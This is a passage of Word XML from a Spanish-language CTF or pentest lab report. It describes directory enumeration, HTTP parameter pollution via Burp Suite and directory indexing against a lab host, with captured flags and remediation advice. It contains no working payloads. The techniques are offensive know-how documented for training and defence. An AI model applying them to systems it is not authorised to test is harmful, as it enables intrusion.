        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE9068A" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recomendación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1- Evita a toda costa las llamadas al sistema, la mayoría de las veces es posible no utilizarlas. 2- Implementa filtros. Si es imprescindible llevar a cabo llamadas al sistema, utiliza filtros y elimina caracteres que no son necesarios. Por ejemplo, si un usuario tiene que colocar su número de teléfono, solo habilita los caracteres numéricos. 3- Coloca un firewall. Esto impedirá que externos inserten código malicioso. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACA1D0" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="40356BB0">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C8A5EC" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5991FDDD" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nombre:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Enumeracion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de directorios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C4EACA" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Criticidad:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Alta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D70299E" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F94AE5" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">--Permite a los atacantes acceder a archivos fuera del directorio deseado -Esto ocurre porque hay directorios o rutas en el servidor que no deberían ser accesibles públicamente </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(por ejemplo, directorios de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, archivos de configuración, directorios de administración, etc.), pero que están accesibles sin autenticación ni restricciones. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BB0B61" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52B0806C" w14:textId="201BDEF8" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6845854A" wp14:editId="72CD27FD">
            <wp:extent cx="4782217" cy="3305636"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="140931359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13594" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4782217" cy="3305636"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B968F" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010BD84D" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">se listan directorios ocultos, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>obteniendose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> varios los cuales nos dan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>informacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> especialmente el /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http://192.168.1.141/uploads/ FLAG: FLAG{ENUMERA_DIRECTORIOS_SIEMPRE}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E75A81D" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BF2578" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recomendación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1- Deshabilitar el listado de directorios (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Directory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Listing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) en el servidor web 2- Restringir el acceso a directorios sensibles con autenticación o reglas de firewall 3- Eliminar o mover directorios y archivos sensibles fuera del directorio web público</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0D5618" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="49E1608C">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CACA6F8" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768E402C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nombre:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Contaminación de parámetros HTTP (HPP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A40CE25" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Criticidad:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Alta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33314C84" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05512D16" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Permite a los atacantes manipular URL o parámetros POST Cuando una solicitud HTTP contiene múltiples parámetros con el mismo nombre, los distintos lenguajes y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">pueden procesarlos de maneras diferentes. Un atacante puede aprovechar esta ambigüedad para: Evadir controles de seguridad. Manipular lógica de la aplicación. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bypassear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> filtros o autenticaciones. Modificar valores críticos del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B6343" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5BB2A4" w14:textId="332E200B" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B901187" wp14:editId="799F88C7">
            <wp:extent cx="4706007" cy="3229426"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="110269700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97009" name="Imagen 1" descr="Interfaz de usuario gráfica, Aplicación&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4706007" cy="3229426"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE12B58" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0848D339" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observamos que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>un formulario se utilizaron</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> varios </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metodos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, fuerza bruta, comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDBD5BF" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A3E863" w14:textId="3F4FF0C3" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78D42E85" wp14:editId="2F8C18FB">
            <wp:extent cx="4848902" cy="3153215"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="7379503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5035" name="Imagen 1" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4848902" cy="3153215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5316FC4C" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D9E3C0" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Utilizamos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para capturar la información y se esa manera inyectar parámetros GET o POST FLAG{BYPASS1NG_HTTP_METH0DS_G00D!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4903050E" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E5CECB" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recomendación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1-Validar y desinfectar la entrada y evitar parámetros duplicados 2- Validación estricta del lado del servidor 3- Filtrado y normalización de parámetros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723AFA04" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="6311ED18">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B96551A" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314BA4C8" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nombre:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Indexacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de Directorios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD5A6F" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Criticidad:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B831CA1" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEE3131" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Cuando la indexación de directorios está habilitada, un servidor web muestra una lista de los archivos y subdirectorios dentro de un directorio específico en lugar de mostrar una página web. La exposición de la estructura del sitio puede ser aprovechada por atacantes para identificar archivos sensibles, como copias de seguridad, archivos de configuración, contraseñas o scripts que podrían ser utilizados para comprometer el sitio. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE2036F" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CAAA2F8" w14:textId="5BE73F1C" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="516CEDF6" wp14:editId="0B34A2C3">
            <wp:extent cx="5239481" cy="676369"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="95928166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1667" name="Imagen 1" descr="Tabla&#10;&#10;El contenido generado por IA puede ser incorrecto."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5239481" cy="676369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B08A5" w14:textId="77777777" w:rsidR="00437FF1" w:rsidRDefault="00437FF1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C761DB" w14:textId="452E56CA" w:rsidR="00437FF1" w:rsidRDefault="007F1491">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:divId w:val="198251480"/>
      </w:pPr>
      <w:r w:rsidRPr="007F1491">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05E08739" wp14:editId="02EADCCF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>110490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>501650</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21430"/>
                <wp:lineTo x="21488" y="21430"/>
                <wp:lineTo x="21488" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="190678345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83457" name="Imagen 1" descr="Interfaz de usuario gráfica, Aplicación&#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5400040" cy="2822575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t>se observa un directorio llamado /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000000">
        <w:t>cyberacademy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
